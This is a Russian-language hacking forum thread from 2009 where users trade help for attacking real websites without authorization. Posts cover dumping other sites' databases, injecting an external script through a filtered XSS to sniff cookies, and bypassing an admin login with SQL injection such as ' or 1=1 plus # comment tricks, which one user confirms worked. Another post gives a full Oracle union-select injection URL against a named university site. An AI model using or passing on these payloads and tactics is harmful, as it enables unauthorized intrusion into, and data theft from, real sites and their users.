Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Всем привет ,Нашел скулю,порыл оказалось несколько баз WP,joomla, самого сайта база и еще пару штук,доступ ко всем базам есть.админку самого сайта я так и не нашел,даже базу ковырять не стал
    Вопрос: как определить к каким сайтам принадлежат другие базы?если возможно конечно.
    Ап вопрос решил)))
    вытащил контент из базы,наешл сайт по гуглу )
     
    #8501 Shadrin, 19 Aug 2009
    Last edited: 19 Aug 2009
  2. +casper+

    +casper+ Banned

    Joined:
    27 Jun 2009
    Messages:
    158
    Likes Received:
    34
    Reputations:
    0
    Привет всем. Вопрос: Нашол активную xss, НО фильт обрезает все ссылки. То есть <script>alert()</script> катит, всплывает окошко, а при попытке впихнуть снифер обрезает ссылку. Например, <a href="javascript:void win('page1.html')">page1</a> вот такой код обрезает до <a href="

    Помогите, спасибо зарание!
     
  3. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    для WP:
    Code:
    select option_value from wp_options where option_name='siteurl'
     
  4. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    <script src=http://ссылка_скрипт_с_кодом.js>
     
  5. +casper+

    +casper+ Banned

    Joined:
    27 Jun 2009
    Messages:
    158
    Likes Received:
    34
    Reputations:
    0
    Некатит, может потому что xss во выдвигающемся меню, так только текс. А картинка наверное не грузится(
    Вот в такой байде xss
    Сам код на страницу попадает, но из-за тегов нет обращения к картинке(((
     
    #8505 +casper+, 19 Aug 2009
    Last edited: 19 Aug 2009
  6. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Здраствуите

    кто знает kak можно узнать где на сайте располагается Страничка для входа админа.

    Если это простой перебор ( www.xxx.ru/admin, /login , /backend ...) то у кого нибудь есть список самых стандартных ?

    спосиб..))
     
  7. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    http://forum.antichat.ru/thread40031.html
     
  8. Inotsee

    Inotsee New Member

    Joined:
    24 Jun 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Драсьте.
    Есть админка: http://www.site.com/admin/file.jsp, в админке 2 стандарт поля "логин" и "пасс". При подстановке в логин кавычки, выскакивает
    PHP:
     ERROR:  Syntax error or access violationmessage from server"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and ad_pass=''' at line 1" 
    При вставке в пасс
    PHP:
     ERROR:  Syntax error or access violationmessage from server"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1" 
    Есть ли возможность забраться в админку? И значит ли это, что там инъекция?
    Заранее спасибо, и извиняюсь, если вопрос глупый.
     
  9. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    попробуй в логин ' or 1=1/* пасс чо хочешь
     
  10. Inotsee

    Inotsee New Member

    Joined:
    24 Jun 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Я тоже так сразу подумал. Походу фильтруется /*
    PHP:
     ERROR:  Syntax error or access violationmessage from server"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and ad_pass='qwerty'' at line 1" 
     
  11. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    вместо /* попробуй -- или #
     
  12. Inotsee

    Inotsee New Member

    Joined:
    24 Jun 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    lol не lol, а фильтр все равно не пускает
    PHP:
    '%20' and ad_pass='12345'' at line 1"
     
  13. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    *-- 1*
     
  14. Inotsee

    Inotsee New Member

    Joined:
    24 Jun 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    спасибо братан, получилось. Прошло с #,
     
  15. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 z00MAN

    Блин я не могу запустить, нету прав админа на компе (((. попробовал : madnet.name/tools/madss/ ..... ничего не показал. Есть что нибудь еще ?
     
  16. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    заюзай дедик стоит 1-3 бакса
     
  17. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    помогите плиз , с inj в oracle , а то че то не версию не чо вывести немогу)
     
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Гнусный оракл :mad:

    http://www.kstu.ru/al_spis_sotr.jsp?first=9'+union+select+null,table_name,null,null,null,null,null+from+sys.all_tables--+
     
    2 people like this.
  19. fraIzer

    fraIzer Member

    Joined:
    27 Jul 2009
    Messages:
    11
    Likes Received:
    8
    Reputations:
    0
    del
     
    #8519 fraIzer, 20 Aug 2009
    Last edited: 20 Aug 2009
    1 person likes this.
  20. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    Microsoft JET Database
    не как не могу подобрать таблицу =(
     
    #8520 edge911, 20 Aug 2009
    Last edited: 20 Aug 2009
Thread Status:
Not open for further replies.